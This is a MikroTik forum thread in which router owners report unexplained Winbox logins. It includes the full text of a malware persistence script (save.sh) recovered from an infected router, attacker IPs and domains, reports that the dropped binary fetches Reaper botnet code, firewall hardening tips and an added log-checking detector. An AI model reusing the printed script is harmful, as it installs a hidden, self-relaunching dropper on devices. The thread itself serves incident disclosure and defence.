 
thekrzos
just joined
Topic Author
Posts: 17
Joined: Tue Aug 02, 2016 10:39 am

winbox vulnerable! Unusual login to routers

Fri Apr 20, 2018 10:46 pm

I noticed today an unusual login to my router, which is exposed to an external IP.
The router had only winbox on 8129, ssh on a changed high port and pptp on the default port. Version 6.41.3.
The password is random chars + numbers + special chars and is used nowhere else.

Login to my router:

I updated it to the latest version and downloaded it completely from the outside.

Fortunately, I found two files: save.sh and dnstest.
Maybe their content will help with something:
save.sh

#!/bin/ash
case "$PATH" in
*/usr/local/bin*)
# old versions
dest="/usr/local/bin/"
;;
*)
dest="/flash/bin/"
if [ ! -d "/flash/" ]; then
exit 1
fi
;;
esac


if [ -f $dest/.dnstest ]; then
rm $dest/.dnstest
fi
if [ -f $dest/echo ]; then
rm $dest/echo
fi
if [ -f $dest/.test ]; then
rm $dest/.test
fi

mkdir -p $dest

export PATH=$PATH:$dest
chmod a+x /flash/rw/pckg/dnstest
cp /flash/rw/pckg/dnstest $dest/.dnstest

echo -e "#!/bin/ash\nusleep 180000000\ncp $dest.dnstest /tmp/.dnstest\n/tmp/.dnstest*" > $dest/.test
chmod +x $dest/.test

echo -e "#!/bin/ash\n/$dest.test&\n/bin/echo \$*" > $dest/echo
chmod +x $dest/echo
/flash/rw/pckg/dnstest
rm save.sh
dnstest is a binary file; I can send it after contact by PM.


This is not the only case, this is log from my friend. He got only exposed winbox:

It looks like on the first attempt to log in it somehow miraculously collects the passwords from the router, and later logs in with a user whose permissions = full.

IP:
103.1.221.39
marchdom4.com [162.212.182.119]
march10dom5.com [162.212.182.119]
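An added example (not from any poster in this thread): a Python check that runs over RouterOS log lines and flags the pattern described above, a successful login from an address outside the management range, and a success that follows only one or two failures from the same address rather than a brute-force run. The log lines, the 10.64.98.0/24 management range, the year, and the 198.51.100.23 and 203.0.113.7 addresses are all constructed for this example.

```python
"""Spot the login pattern from this thread in RouterOS log lines.

Added example, not from any poster: RouterOS logs each Winbox/SSH auth as
either 'login failure for user X from IP via svc' or 'user X logged in from
IP via svc'. The thread's pattern is one or two failures from an unknown
address, then a success with a full-permission user, with no brute force in
between. Sample log lines, the 10.64.98.0/24 management range and the
198.51.100.23 / 203.0.113.7 addresses are constructed for this example.
"""
import re
from datetime import datetime
from ipaddress import ip_address, ip_network

# Constructed sample in RouterOS 6 '/log print' style: "<mon>/<day> <time> <topics> <message>".
SAMPLE_LOG = """\
apr/20 22:13:01 system,error,critical login failure for user admin from 198.51.100.23 via winbox
apr/20 22:13:09 system,info,account user netadmin logged in from 198.51.100.23 via winbox
apr/20 22:14:40 system,info,account user netadmin logged out from 198.51.100.23 via winbox
apr/20 23:02:11 system,info,account user netadmin logged in from 10.64.98.20 via winbox
apr/21 01:15:30 system,error,critical login failure for user root from 203.0.113.7 via ssh
apr/21 01:15:31 system,error,critical login failure for user root from 203.0.113.7 via ssh
"""

# Assumed management range: successful logins from anywhere else are suspect.
MGMT_NETS = [ip_network("10.64.98.0/24")]
FAIL_TO_SUCCESS_WINDOW = 120  # seconds between a failure and the success that follows it
BRUTE_FORCE_MIN = 5           # this many failures or more looks like guessing, not a known password

LINE_RE = re.compile(r"^(?P<mon>[a-z]{3})/(?P<day>\d{2}) (?P<time>\d{2}:\d{2}:\d{2}) "
                     r"(?P<topics>[\w,]+) (?P<msg>.*)$")
LOGIN_RE = re.compile(r"user (?P<user>\S+) logged in from (?P<ip>\S+) via (?P<svc>\w+)")
FAIL_RE = re.compile(r"login failure for user (?P<user>\S+) from (?P<ip>\S+) via (?P<svc>\w+)")


def parse_events(log_text, year=2018):
    """Return login/failure events in log order; RouterOS omits the year, so one is supplied."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        hit = LOGIN_RE.search(m["msg"])
        kind = "login"
        if hit is None:
            hit = FAIL_RE.search(m["msg"])
            kind = "fail"
        if hit is None:
            continue  # logouts, firewall hits and other topics are not auth events
        ts = datetime.strptime(f"{m['mon'].capitalize()}/{m['day']} {m['time']} {year}",
                               "%b/%d %H:%M:%S %Y")
        events.append({"ts": ts, "kind": kind, "user": hit["user"],
                       "ip": ip_address(hit["ip"]), "svc": hit["svc"]})
    return events


def is_management(ip):
    """True when the address lies inside one of the assumed management ranges."""
    return any(ip in net for net in MGMT_NETS)


def find_suspicious_logins(events, window=FAIL_TO_SUCCESS_WINDOW, brute_min=BRUTE_FORCE_MIN):
    """Flag successful logins from outside the management range, and successes that
    follow only a handful of failures from the same address (the thread's signature)."""
    alerts = []
    for i, ev in enumerate(events):
        if ev["kind"] != "login":
            continue
        reasons = []
        if not is_management(ev["ip"]):
            reasons.append("login from outside the management range")
        # Failures from the same address shortly before this success.
        recent_fails = [e for e in events[:i]
                        if e["kind"] == "fail" and e["ip"] == ev["ip"]
                        and 0 <= (ev["ts"] - e["ts"]).total_seconds() <= window]
        if 0 < len(recent_fails) < brute_min:
            reasons.append(f"{len(recent_fails)} failure(s) then success within {window}s, "
                           "no brute force: the password was not guessed")
        if reasons:
            alerts.append({"ts": ev["ts"], "user": ev["user"], "ip": str(ev["ip"]),
                           "svc": ev["svc"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in find_suspicious_logins(parse_events(SAMPLE_LOG)):
        print(f"{a['ts']:%b/%d %H:%M:%S} {a['user']} from {a['ip']} via {a['svc']}: "
              + "; ".join(a["reasons"]))
```

On the constructed sample this reports only the netadmin login from 198.51.100.23; the LAN login and the SSH failures that never turned into a success stay quiet.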
 
parham
newbie
Posts: 32
Joined: Sun Feb 15, 2015 11:35 pm

Re: winbox vulnerable! Unusual login to routers

Fri Apr 20, 2018 10:58 pm

Hi, do you have any firewall settings in your MikroTik?
You can have a whitelist of IP addresses allowed to access Winbox; just changing the Winbox port in the services doesn't mean nobody can try to connect to it. You can also have a blacklist for IPs that fail to log in. If you don't have firewall filter rules, I can send you a default set, slightly tweaked.
 
thekrzos
just joined
Topic Author
Posts: 17
Joined: Tue Aug 02, 2016 10:39 am

Re: winbox vulnerable! Unusual login to routers

Fri Apr 20, 2018 11:22 pm

Yes, I have a firewall, but the Winbox port was exposed to the internet.
That is where the attack came from.
 
Sob
Forum Guru
Posts: 4806
Joined: Mon Apr 20, 2009 9:11 pm

Re: winbox vulnerable! Unusual login to routers

Sat Apr 21, 2018 12:42 am

This looks interesting ... scary interesting.

Send everything to support@mikrotik.com. They will probably notice it here, and if it's real, it will get to them from elsewhere too, but the sooner they get the info, the better.
People who quote full posts should be spanked with ethernet cable. Some exceptions for multi-topic threads may apply.
 
squeeze
Member Candidate
Posts: 146
Joined: Thu Mar 22, 2018 7:53 pm

Re: winbox vulnerable! Unusual login to routers

Sat Apr 21, 2018 12:45 am

If true, this is a very serious vulnerability and you should report it directly to Mikrotik support so they can fix it ASAP.

Btw, a basic security precaution is to remove or rename the "admin" user and use a different name entirely. There is nothing special about the "admin" name. In this case, it may not be relevant since they logged in with so few attempts.

Also, in general there should be no public-facing remote router administration service. Best is to use a VPN. Next best is to allow login on Winbox or SSH only from specific IPs.
 
wispmikrotik
Frequent Visitor
Posts: 53
Joined: Tue Apr 25, 2017 10:43 am

Re: winbox vulnerable! Unusual login to routers

Sat Apr 21, 2018 12:49 am

Hello everyone,

The same thing happened to me today.

Image

What's happening, MikroTik team?
A security problem that wasn't disclosed?
Bug or backdoor?

AS131149 103.1.220.0/23 LJ Hosting Co., LTD
IP Address: 103.1.221.29
Hostname: 103-1-221-29.static.ip.net.tw
Name Servers: a.g-dns.com, b.g-dns.com, c.g-dns.com
Authority: a.g-dns.com, support@twnoc.net, 221.1.103.in-addr.arpa
Network: 103.1.221.0/24, AS131149, YUANJHEN-AS-TW Yuan-Jhen Info., Co., Ltd, TW
Designation: APNIC
Location: Banqiao, Taiwan (25.0143, 121.4672)
 
parham
newbie
Posts: 32
Joined: Sun Feb 15, 2015 11:35 pm

Re: winbox vulnerable! Unusual login to routers

Sat Apr 21, 2018 12:52 am

Yes, I have a firewall, but the Winbox port was exposed to the internet.
That is where the attack came from.
Interesting; by any chance did you use admin as the user, or was it changed?

I think the best way is to use a whitelist and netinstall the router.

But before doing that, send a supout file to MikroTik.

And lastly, use a strong SSH key.
 
parham
newbie
Posts: 32
Joined: Sun Feb 15, 2015 11:35 pm

Re: winbox vulnerable! Unusual login to routers

Sat Apr 21, 2018 1:14 am

I just checked most of my routers; all were OK (6.40.7), but one of them on 6.41.3 had been attacked a lot. I had a rule to collect and block them, and no login was established. I believe it is a bug in 6.41.3 in the firewall filter: I had a whitelist for input, but it looks like it wasn't working, or somehow other rules below it were giving any IP access to connect, which they shouldn't.
 
parham
newbie
Posts: 32
Joined: Sun Feb 15, 2015 11:35 pm

Re: winbox vulnerable! Unusual login to routers

Sat Apr 21, 2018 1:41 am

Just to stop the attackers, create a whitelist address list, for example called Support, and then the raw firewall rule:

/ip firewall raw
add action=drop chain=prerouting dst-port=22,80,8291 log=yes protocol=tcp src-address-list=!Support
 
wispmikrotik
Frequent Visitor
Posts: 53
Joined: Tue Apr 25, 2017 10:43 am

Re: winbox vulnerable! Unusual login to routers

Sat Apr 21, 2018 1:43 am

I have already notified MikroTik support; I could not send the support file because the router is blocked.
@normis, MikroTik team, can you check this immediately?
This is very serious.
 
wispmikrotik
Frequent Visitor
Posts: 53
Joined: Tue Apr 25, 2017 10:43 am

Re: winbox vulnerable! Unusual login to routers

Sat Apr 21, 2018 1:50 am

Just to stop the attackers, create a whitelist address list, for example called Support, and then the raw firewall rule:

/ip firewall raw
add action=drop chain=prerouting dst-port=22,80,8291 log=yes protocol=tcp src-address-list=!Support
Hello,
I had configured it so that after 3 failed access attempts the IP is blocked, but they got in on the first attempt with a key made of numbers, signs, uppercase and lowercase letters. It is clear that it is a very serious bug that does not require any effort to gain control of the router.
 
jspool
Member
Posts: 395
Joined: Sun Oct 04, 2009 4:06 am
Location: Oregon

Re: winbox vulnerable! Unusual login to routers

Sat Apr 21, 2018 2:01 am

Good catch. Will be interesting to get more details. Unfortunately vulnerabilities are a fact of life these days. For the last ten years I have only allowed trusted IPs access to Winbox & SSH. It's never a good idea to expose unnecessary things to the Internet in the hope that they will be resilient enough to ward off the ever so persistent probes and attacks. And changing port numbers helps to a point. I suppose if you use a good port scan blocker in your firewall you may be lucky and detect them before they find you. It's always better to restrict to specific networks or only allow access from VPN.
 
manuzoli
Frequent Visitor
Posts: 68
Joined: Mon Oct 03, 2016 6:47 pm

Re: winbox vulnerable! Unusual login to routers

Sat Apr 21, 2018 1:48 pm

Looks like MikroTik has sold well enough to become a very promising attack target for the bad guys.

I run an average network (a public class C network) and I see an average of 215.000 attempted attacks per day.
That's about 2.5 attacks a second. I guess it's a good thing to ramp up security and block SSH, HTTP, FTP and especially Winbox so attackers have no hint that you are using MikroTik devices.
 
anav
Forum Guru
Posts: 3120
Joined: Sun Feb 18, 2018 11:28 pm
Location: Nova Scotia, Canada

Re: winbox vulnerable! Unusual login to routers

Sat Apr 21, 2018 6:45 pm

Do we even know if mikrotik closed this door with 6.42???
I'd rather manage rats than software. Follow my advice at your own risk! (Sob & mkx forced me to write that!)
 
sindy
Forum Guru
Posts: 3959
Joined: Mon Dec 04, 2017 9:19 pm

Re: winbox vulnerable! Unusual login to routers

Sat Apr 21, 2018 6:59 pm

Do we even know if mikrotik closed this door with 6.42???
Likely not, as it seems to be a new issue. So disable access to Winbox from the internet, and even better restrict it to just a few addresses from the LAN, until it becomes clear.
Instead of writing novels, post /export hide-sensitive. Use find&replace in your favourite text editor to systematically replace all occurrences of each public IP address potentially identifying you by a distinctive pattern such as my.public.ip.1.
 
JohnTRIVOLTA
Member Candidate
Posts: 207
Joined: Sun Dec 25, 2016 2:05 pm
Location: BG/Sofia

Re: winbox vulnerable! Unusual login to routers

Sat Apr 21, 2018 7:38 pm

1. Set a user name and password with a combination including the Cyrillic alphabet; after that remove or disable the user admin!
2. Change the port numbers for ssh, winbox etc.
3. Set strong crypto for ssh.
4. Set an ACL.
5. Set 3 login attempts to blacklist and deny attempts with RAW.
6. Disable all other unused services.
Finally connect the cable to the WAN ethernet port!
 
wispmikrotik
Frequent Visitor
Posts: 53
Joined: Tue Apr 25, 2017 10:43 am

Re: winbox vulnerable! Unusual login to routers

Sat Apr 21, 2018 8:32 pm

1. Set a user name and password with a combination including the Cyrillic alphabet; after that remove or disable the user admin!
2. Change the port numbers for ssh, winbox etc.
3. Set strong crypto for ssh.
4. Set an ACL.
5. Set 3 login attempts to blacklist and deny attempts with RAW.
6. Disable all other unused services.
Finally connect the cable to the WAN ethernet port!
On point 1 you're wrong, just like on the password type: I had a password like "@ _23UbakJav!2947!#6hasd! - +)" and they got in with a single attempt. It is something more serious that lets them see the key; the only way is to close all the ports to the computers on the LAN.
 
IS0FFD
just joined
Posts: 12
Joined: Thu Dec 29, 2016 10:30 pm
Location: Sassari - Sardinia Island ITA

Re: winbox vulnerable! Unusual login to routers

Sat Apr 21, 2018 9:04 pm

I had the same visit on three different days...


I noticed that it is from the day after the update to 6.42 .... randomness???

I have set the due rules... I hope!!!!!!
 
Quasar
just joined
Posts: 19
Joined: Sun Oct 05, 2014 1:11 pm

Re: winbox vulnerable! Unusual login to routers

Sat Apr 21, 2018 9:13 pm

Can you please upload the 'dnstest' binary? Might provide some clues as to what's going on..
 
thekrzos
just joined
Topic Author
Posts: 17
Joined: Tue Aug 02, 2016 10:39 am

Re: winbox vulnerable! Unusual login to routers

Sat Apr 21, 2018 9:45 pm

password: mikrotik
 
JohnTRIVOLTA
Member Candidate
Posts: 207
Joined: Sun Dec 25, 2016 2:05 pm
Location: BG/Sofia

Re: winbox vulnerable! Unusual login to routers

Sat Apr 21, 2018 9:54 pm

On point 1 you're wrong, just like on the password type: I had a password like "@ _23UbakJav!2947!#6hasd! - +)" and they got in with a single attempt. It is something more serious that lets them see the key; the only way is to close all the ports to the computers on the LAN.
Where is the Cyrillic alphabet?
 
Joe1vm
just joined
Posts: 22
Joined: Sat Apr 06, 2013 4:07 pm

Re: winbox vulnerable! Unusual login to routers

Sat Apr 21, 2018 10:06 pm

BTW - interesting afternoon - 62 attempts (unique IPs) on ports 22,23,80,8291 within last 3 hours, never seen such wave before....
 
sindy
Forum Guru
Posts: 3959
Joined: Mon Dec 04, 2017 9:19 pm

Re: winbox vulnerable! Unusual login to routers

Sat Apr 21, 2018 10:12 pm

Where is the Cyrillic alphabet/s/?
Why do you think that a password using the Cyrillic alphabet would be safer than a complex one in pure ASCII, given that there was obviously no brute-force attack on the password, so the attack must use some security hole bypassing the password authentication or some default password? If so many people let their complex ASCII passwords leak, it's equally likely that Cyrillic passwords could be leaked as well, so it is again no protection. Using exotic alphabets makes dictionary attacks much harder, but not those which either don't need a password at all or obtain the correct one some other way.
 
BartoszP
Forum Guru
Posts: 1717
Joined: Mon Jun 16, 2014 1:13 pm
Location: Poland

Re: winbox vulnerable! Unusual login to routers

Sat Apr 21, 2018 10:22 pm

@Joe1vm ... only 62 ....
"My" past few days: 56k+ tries ...... :-(
The Winbox section drops the specified ports and makes a list of IPs which try 2+ times to access those ports.
Same for the RAW section, which does the same for the sbl lists. If it is already in the RAW list then drop it early to avoid checking 20k+ entries of sbl lists. The second picture comes from another router.
8291_1.PNG
Last hour ... 87 different IPs scanning my router
8291_2.PNG
Real admins use real keyboards.
 
Sans
just joined
Posts: 15
Joined: Sun Mar 11, 2018 1:47 am

Re: winbox vulnerable! Unusual login to routers

Sun Apr 22, 2018 10:31 am

Can someone please advise how to check if the router has the save.sh and dnstest files? Where are these files saved?

I have been making too many config changes, so I'm unsure whether something slipped through the cracks.

My winbox, ssh, telnet etc. are only accessible from LAN IP ranges, but I have a PPTP server running. I can see in the log that it shows lots of established TCP connections for pptp. Is that an issue?
2018-04-22 17_34_23-admin@10.64.98.254 (MKTK3011) - WinBox v6.41.1 on RB3011UiAS (arm).png
This is good right?
2018-04-22 17_35_24-admin@10.64.98.254 (MKTK3011) - WinBox v6.41.1 on RB3011UiAS (arm).png
Do I still need to add firewall rules to close ports?
Thanks!
 
Quasar
just joined
Posts: 19
Joined: Sun Oct 05, 2014 1:11 pm

Re: winbox vulnerable! Unusual login to routers

Sun Apr 22, 2018 11:00 am

password: mikrotik
Thanks!

dnstest is actually a dropper: it downloads and executes an additional executable which seems to be related to the Reaper botnet: IoT_reaper: A Rappid Spreading New IoT Botnet

It doesn't provide any clue as to how you were infected though.
Can someone please advise how to check if the router has the save.sh and dnstest files? Where are these files saved?
They're supposed to end up in /flash/bin/ according to the save.sh script; you can't access them there.
Do I still need to add firewall rules to close ports?
Add an OUTPUT LOG rule for 162.212.182.119. If it hits, you're infected. And block Winbox while no one knows what's going on.
 
strods
MikroTik Support
Posts: 1409
Joined: Wed Jul 16, 2014 7:22 am
Location: Riga, Latvia

Re: winbox vulnerable! Unusual login to routers

Sun Apr 22, 2018 11:16 am

We are sorry to hear that you have experienced such a problem. Until now we were not aware of any problems with Winbox or of any possibility to gain access to your router by using this service. We are now working to find out what happened here.

Thank you to those of you who contacted support directly. Those of you who did not, please write to support@mikrotik.com and:

1) Tell us the RouterOS version which was installed on your device;
2) Tell us if the Winbox port was protected or anyone could access it;
3) Tell us if you used the username admin or it was changed to another name besides this default one;
4) Tell us if the password was secure and not too simple, like for example "password";
5) Tell us whether Winbox was configured on the default port or the port was changed under IP/Services to another value.

While we are looking into this problem:

1) Protect your device (any service) from attacks by using the firewall. If you definitely need open access for some service, then either whitelist the IP or domain name or use port knocking;
2) Make sure that there is no user called admin configured on your router;
3) Make sure that you change the passwords for all users if there is a chance that your device was affected;
4) Make sure that you are running the latest RouterOS version, to be sure that this is not a problem which was already resolved in the past.
 
msatter
Forum Guru
Posts: 1293
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: winbox vulnerable! Unusual login to routers

Sun Apr 22, 2018 12:00 pm

@Strods: Make sure that there is no user called admin configured on your router

A lot of us create a new user that replaces the user admin and then just disable the user admin and leave it on the box, deactivated. Is it better to remove the user admin, in case that could still be an attack vector?
Two RB760iGS (hEX S) in series. One does PPPoE and both do IKEv2.
Running:
RouterOS 6.46Beta59 / Winbox 3.20 / MikroTik APP 1.3.7
Having an Android device, use https://github.com/M66B/NetGuard/releases (no root required)
 
thekrzos
just joined
Topic Author
Posts: 17
Joined: Tue Aug 02, 2016 10:39 am

Re: winbox vulnerable! Unusual login to routers

Sun Apr 22, 2018 12:11 pm

2) Make sure that there is no user called admin on your router configured;
4) Make sure that you are running latest RouterOS version to be sure that this is not a problem which is already resolved in the past.
User admin WAS REMOVED FROM THIS ROUTER. Version 6.41.3
 
Sans
just joined
Posts: 15
Joined: Sun Mar 11, 2018 1:47 am

Re: winbox vulnerable! Unusual login to routers

Sun Apr 22, 2018 1:26 pm

I managed to royally screw up my access to the router while applying new security firewall rules. Now I have no access - IP or MAC. Any recommendation to get my access back and delete the RAW firewall rule I just put in? I can't afford to reset it because of unfinished documentation (my fault). Thanks!
 
sindy
Forum Guru
Posts: 3959
Joined: Mon Dec 04, 2017 9:19 pm

Re: winbox vulnerable! Unusual login to routers

Sun Apr 22, 2018 1:54 pm

I managed to royally screw up my access to the router while applying new security firewall rules. Now I have no access - IP or MAC. Any recommendation to get my access back and delete the RAW firewall rule I just put in? I can't afford to reset it because of unfinished documentation (my fault). Thanks!
If even MAC access doesn't work, game over unless you have a serial port on board or a USB port to which you could connect a USB to serial converter.
 
Sans
just joined
Posts: 15
Joined: Sun Mar 11, 2018 1:47 am

Re: winbox vulnerable! Unusual login to routers

Sun Apr 22, 2018 2:24 pm

If even MAC access doesn't work, game over unless you have a serial port on board or a USB port to which you could connect a USB to serial converter.

It's a 3011, there is an RJ45 serial console and a USB port. Is it possible to delete one line from firewall through any of these? Thanks
 
sindy
Forum Guru
Posts: 3959
Joined: Mon Dec 04, 2017 9:19 pm

Re: winbox vulnerable! Unusual login to routers

Sun Apr 22, 2018 2:48 pm

If even MAC access doesn't work, game over unless you have a serial port on board or a USB port to which you could connect a USB to serial converter.
It's a 3011, there is an RJ45 serial console and a USB port. Is it possible to delete one line from the firewall through any of these? Thanks
If you have a serial port on your PC or can provide one using a USB to serial converter, and you either have the RJ-45/DB-9 serial cable or are able to put one together, or you have a "null modem" cable/adaptor and (another) USB to serial converter, then yes, this is the way. You connect to the MikroTik using any serial terminal software with your normal username and password, and the RouterOS command line is exactly the same as when you connect using ssh or telnet.

RJ45 serial pinouts are not standardized, so make sure you use a MikroTik-compatible one.
 
Sans
just joined
Posts: 15
Joined: Sun Mar 11, 2018 1:47 am

Re: winbox vulnerable! Unusual login to routers

Sun Apr 22, 2018 2:57 pm

Thanks sindy; just one more question. Can I access the serial console while the router is in its normal running state? This is a production router and it is not possible for me to turn it off or disconnect it easily.

I am sure I have a null modem cable lying around somewhere; haven't had to use one in 10 years or so :) I think the one I have is a DB-9 to DB-9.

Edit: Ok, found it. DB-9 to DB-9 null modem cable and also found the DB-9 to usb converter to go with it. Hopefully this will go smooth tomorrow.
 
normis
MikroTik Support
Posts: 24268
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: winbox vulnerable! Unusual login to routers

Sun Apr 22, 2018 3:25 pm

Until we know more, Firewall the Winbox port for unknown IP addresses.
Email any useful information to support@mikrotik.com

Thank you. We are working on it.
No answer to your question? How to write posts
 
sindy
Forum Guru
Posts: 3959
Joined: Mon Dec 04, 2017 9:19 pm

Re: winbox vulnerable! Unusual login to routers

Sun Apr 22, 2018 3:29 pm

Thanks sindy; just one more question. Can I access the serial console while the router is in its normal running state? This is a production router and it is not possible for me to turn it off or disconnect it easily.

I am sure I have a null modem cable lying around somewhere; haven't had to use one in 10 years or so :) I think the one I have is a DB-9 to DB-9.

Edit: Ok, found it. DB-9 to DB-9 null modem cable and also found the DB-9 to usb converter to go with it. Hopefully this will go smooth tomorrow.
If I had time till tomorrow, I'd put together the RJ-45 to DB-9 cable myself. I don't know your software version and I have no machine with an embedded serial port, so I'm not sure whether the USB serial port becomes a console one even if a console port already exists in the system, and whether your version handles connection of a USB to serial converter on the fly (I had some issues when connecting and disconnecting two different USB to serial converters several times).

Apparently the light blue Cisco cable is directly compatible if you have one. Don't know how easily electronic parts are available in your part of the world, but if you don't trust yourself when it comes to use of a soldering iron, there are crimp-type DB-9 available, and the DB-9-to-RJ-45 adaptors are also sold "unconfigured" so you can use a LAN cable and this adaptor and you're good.

And check your terminal software first - connect pins 2 and 3 on the DB-9 and see that what you type on the keyboard appears on the screen when they are connected and doesn't when they are not.


 
Sans
just joined
Posts: 15
Joined: Sun Mar 11, 2018 1:47 am

Re: winbox vulnerable! Unusual login to routers

Sun Apr 22, 2018 4:04 pm

If I had time till tomorrow, I'd myself put together the RJ-45 to DB-9 cable.
Apparently the light blue Cisco cable is directly compatible if you have one.
I think we have Cisco compatible rollover cable hidden away in a cupboard somewhere in the store room; will have to look for it tomorrow.

I don't think my DB9 cable and USB converter can be used without some surgery. We do have such expertise (electronics + mechatronics + electrical + controls) in-house if I need it. I could be reasonably dangerous with a soldering iron if it comes to that.

I am confident our old Dell laptop with Windows 2000 will still work so we have HyperTerminal and serial port available. I can still sleep peacefully knowing if I can't get in, no one else could either; hopefully :)

Thanks for your valuable advice.
 
msbr
just joined
Posts: 8
Joined: Thu Sep 17, 2015 10:30 pm
Location: Mendoza
Contact:

winbox vulnerable! Unusual login to routers

Sun Apr 22, 2018 7:44 pm

For security, always change the default ports of services: Winbox, API


Sent from my iPhone using Tapatalk
 
R1CH
Forum Veteran
Posts: 904
Joined: Sun Oct 01, 2006 11:44 pm

Re: winbox vulnerable! Unusual login to routers

Sun Apr 22, 2018 11:02 pm


Also, in general there should be no public facing remote router administration service. Best is to use a VPN. Next best is to allow login on Winbox or SSH only from specific IPs.
The VPN still requires exposure to the internet. Given how MikroTik writes their own VPN daemons, I don't see how a VPN would be more secure than Winbox, given that almost every MikroTik daemon seems to have some kind of security bug lately. Hopefully this turns out to be something milder, like a compromised admin PC (e.g. auto-updating Winbox is extremely insecure: an attacker can send any .exe to be run on your PC), and not a vulnerability in Winbox itself.

Update: Checked all my routers with exposed 8291 and nothing untoward in the logs or connections. However, Winbox only seems to record a log entry on a successful or failed auth; if this is really an exploit in the daemon (as evidenced by the attempt to run a shell script and an executable), such a compromise might not even be logged, and if the malware is stealthy it may never even be visible to the admin post-exploit, since it could trivially erase logs and such. This is another reason why admins should have shell access; without it, it's impossible to run forensic checks for the presence of such malware.

Update 2: I've been monitoring connection attempts to 8291 with ~30 IPs, not a single SYN packet in the last two hours, so doesn't look like there's a worm or mass scan going on.
 
squeeze
Member Candidate
Posts: 146
Joined: Thu Mar 22, 2018 7:53 pm

Re: winbox vulnerable! Unusual login to routers

Mon Apr 23, 2018 1:25 am

Do any of these affected routers have the UPnP service enabled at all, including on LAN?
 
quangvu37
just joined
Posts: 2
Joined: Thu Sep 10, 2015 11:42 am

Re: winbox vulnerable! Unusual login to routers

Mon Apr 23, 2018 6:43 am

Hi Mikrotik Team,

We also observed this issue on some of our Devices, even if the hacked account is not 'admin'.
Image

The Device is RB1100AHx2 with RouterOS v6.41.4!

Kindly help us to check this vulnerability soon.

Thanks!
 
strods
MikroTik Support
Posts: 1409
Joined: Wed Jul 16, 2014 7:22 am
Location: Riga, Latvia

Re: winbox vulnerable! Unusual login to routers

Mon Apr 23, 2018 8:11 am

Everyone who seems to be affected (saw failed login attempts from an unknown IP which in the end resulted in a successful login) and saw these files created on the router: please write to support@mikrotik.com. Send us a supout file from your router. If it would be possible to get remote access to your router, that would be the best way for us to try to determine how the attacker gained access to your router.
 
blingblouw
Member Candidate
Posts: 273
Joined: Wed Aug 25, 2010 9:43 am

Re: winbox vulnerable! Unusual login to routers

Mon Apr 23, 2018 10:56 am

Are all these attacks coming from the same source?

103.1.221.39
 
honzam
Forum Guru
Posts: 2293
Joined: Wed Feb 27, 2008 10:27 pm
Location: Czech Republic

Re: winbox vulnerable! Unusual login to routers

Mon Apr 23, 2018 12:43 pm

@mikrotik
Maybe it's time to issue a warning to main page of Forum?

On Czech forum: https://ispforum.cz/viewtopic.php?p=228818#p228818
On Polish forum: https://www.trzepak.pl/viewtopic.php?f=26&p=487659
LAN, FTTx, Wireless. ISP operator
 
normis
MikroTik Support
Posts: 24268
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: winbox vulnerable! Unusual login to routers  [SOLVED]

Mon Apr 23, 2018 1:06 pm
